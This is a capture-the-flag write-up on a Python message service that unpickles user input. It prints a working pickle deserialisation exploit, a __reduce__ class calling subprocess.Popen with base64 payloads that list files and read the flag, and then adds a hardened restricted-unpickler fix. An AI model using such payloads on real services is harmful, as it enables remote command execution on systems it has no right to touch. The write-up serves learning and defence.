We connect to the service. We encrypt the string qq and decode it.

```
$ nc cha.hackpack.club 41704
[*] Welcome to our Super Secure Message Encrypter (SSME - copyright pending)
[*] We use patented technology that only we have access to in order to safely encrypt your data
[*] Please use this tool to encrypt/decrypt messages

[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 1
What would you like to encrypt? qq
[+] Message encrypted: gANYAgAAAHFxcQAu

[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gANYAgAAAHFxcQAu
[+] Message decrypted: qq
```

Then we send a malformed input for decryption, which generates an error:

```
[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gANYAgAAAHFxc
Traceback (most recent call last):
  File "/usr/lib/python3.6/encodings/base64_codec.py", line 19, in base64_decode
    return (base64.decodebytes(input), len(input))
  File "/usr/lib/python3.6/base64.py", line 546, in decodebytes
    return binascii.a2b_base64(s)
binascii.Error: Incorrect padding

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/challenger/app.py", line 46, in <module>
    main()
  File "/home/challenger/app.py", line 37, in main
    dec = decrypt(to_dec)
  File "/home/challenger/app.py", line 24, in decrypt
    return pickle.loads(codecs.decode(to_dec.encode(), "base64"))
binascii.Error: decoding with 'base64' codec failed (Error: Incorrect padding)
```

The traceback discloses that the service "decrypts" messages with Python's pickle module (`pickle.loads` on the base64-decoded input). Unpickling untrusted data is known to be unsafe: a crafted pickle can make the loader call arbitrary callables, which allows command execution.

We create a pickle to execute OS commands on the system:

```
>>> import pickle
>>> import subprocess
>>> import base64
>>>
>>> class RunBinSh(object):
...     def __reduce__(self):
...         return (subprocess.Popen, (('ls',),))
...
>>> print(base64.b64encode(pickle.dumps(RunBinSh())))
b'gASVIwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwCbHOUhZSFlFKULg=='
```

We submit the generated pickle to the decrypt option; the `ls` output shows up in the session right after the menu:

```
$ nc cha.hackpack.club 41704
[*] Welcome to our Super Secure Message Encrypter (SSME - copyright pending)
[*] We use patented technology that only we have access to in order to safely encrypt your data
[*] Please use this tool to encrypt/decrypt messages

[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> 2
Please enter the encrypted string here: gASVIwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwCbHOUhZSFlFKULg==
[+] Message decrypted: <subprocess.Popen object at 0x7f2b6d9a9550>

[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> app.py
flag.txt
```

We generate a new pickle to read the flag:

```
>>> class RunBinSh(object):
...     def __reduce__(self):
...         return (subprocess.Popen, (('cat', 'flag.txt',),))
...
>>> print(base64.b64encode(pickle.dumps(RunBinSh())))
b'gASVLwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwIZmxhZy50eHSUhpSFlFKULg=='
```

```
Please enter the encrypted string here: gASVLwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwIZmxhZy50eHSUhpSFlFKULg==
[+] Message decrypted: <subprocess.Popen object at 0x7f2b6d9a4438>

[*] Please select from the following options
1.) Encrypt a message
2.) Read a message
3.) Quit
> flag{n3v3R_u$e_p!ckLe_w_uNtru$t3d_d4t4}
```
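As an added defensive example (not part of the original writeup or the challenge's `app.py`), the snippet below is a hardened replacement for the service's `decrypt()` seen in the traceback. The base64 blobs are the ones from the transcripts above: the service's own encoding of `qq`, the `subprocess.Popen` pickle, and the truncated input that produced the traceback. The function and class names (`scan_b64`, `RestrictedUnpickler`, `safe_decrypt`, `decrypt_outcome`) are my own. It shows two layers: a static scan with `pickletools.genops` that lists import/call opcodes without executing anything, and an `Unpickler.find_class` override that refuses every global, so a `REDUCE` can never reach a callable.

```python
import base64
import io
import pickle
import pickletools

# Base64 blobs copied from the writeup's transcripts (not constructed here).
BENIGN_B64 = "gANYAgAAAHFxcQAu"  # the service's own encoding of the string "qq"
RCE_B64 = "gASVIwAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwCbHOUhZSFlFKULg=="  # subprocess.Popen(('ls',))
MALFORMED_B64 = "gANYAgAAAHFxc"  # truncated input that produced the traceback

# Opcodes that import or call something while the stream is loaded. A pickle
# that only carries data, like everything the service itself produces, never
# needs any of them.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ",
                     "NEWOBJ_EX", "REDUCE", "BUILD", "EXT1", "EXT2", "EXT4"}


def scan_b64(to_dec: str) -> list:
    """Layer 1: decode the base64 and list risky opcodes WITHOUT executing the pickle.
    genops only parses the opcode stream; nothing is imported or called."""
    raw = base64.b64decode(to_dec, validate=True)  # binascii.Error (a ValueError) on bad input
    return [op.name for op, _arg, _pos in pickletools.genops(raw)
            if op.name in DANGEROUS_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Layer 2: deny every global lookup. find_class is consulted for GLOBAL,
    STACK_GLOBAL and INST, so no callable can be placed on the stack for REDUCE."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def find_class_refused(to_dec: str) -> bool:
    """True if layer 2 alone stops this blob (used to show each layer works on its own)."""
    raw = base64.b64decode(to_dec, validate=True)
    try:
        RestrictedUnpickler(io.BytesIO(raw)).load()
        return False
    except pickle.UnpicklingError:
        return True


def safe_decrypt(to_dec: str):
    """Hardened replacement for the service's decrypt(): same input format,
    but only data-bearing pickles are loaded, and through the restricted loader."""
    found = scan_b64(to_dec)
    if found:
        raise pickle.UnpicklingError(f"rejected opcodes {found}")
    raw = base64.b64decode(to_dec, validate=True)
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def decrypt_outcome(to_dec: str):
    """Return ('ok', value), ('blocked', reason) or ('malformed', reason), so the
    caller can log a rejection instead of leaking a traceback to the client."""
    try:
        return ("ok", safe_decrypt(to_dec))
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))
    except ValueError as exc:  # bad base64 or an unparsable opcode stream
        return ("malformed", str(exc))


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_B64), ("rce", RCE_B64), ("malformed", MALFORMED_B64)):
        print(label, decrypt_outcome(blob))
```

The real fix for a service like this is to stop unpickling client input altogether (a JSON string survives the round trip just as well); the restricted loader is the fallback when the pickle format has to stay. Note that the service's original `codecs.decode(..., "base64")` also raised on the truncated blob, but let the traceback reach the client, which is exactly the hint that revealed pickle in the first place; `decrypt_outcome` keeps that detail server-side.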

Original writeup (https://maggick.fr/2020/04/hackpack-ctf-2020.html).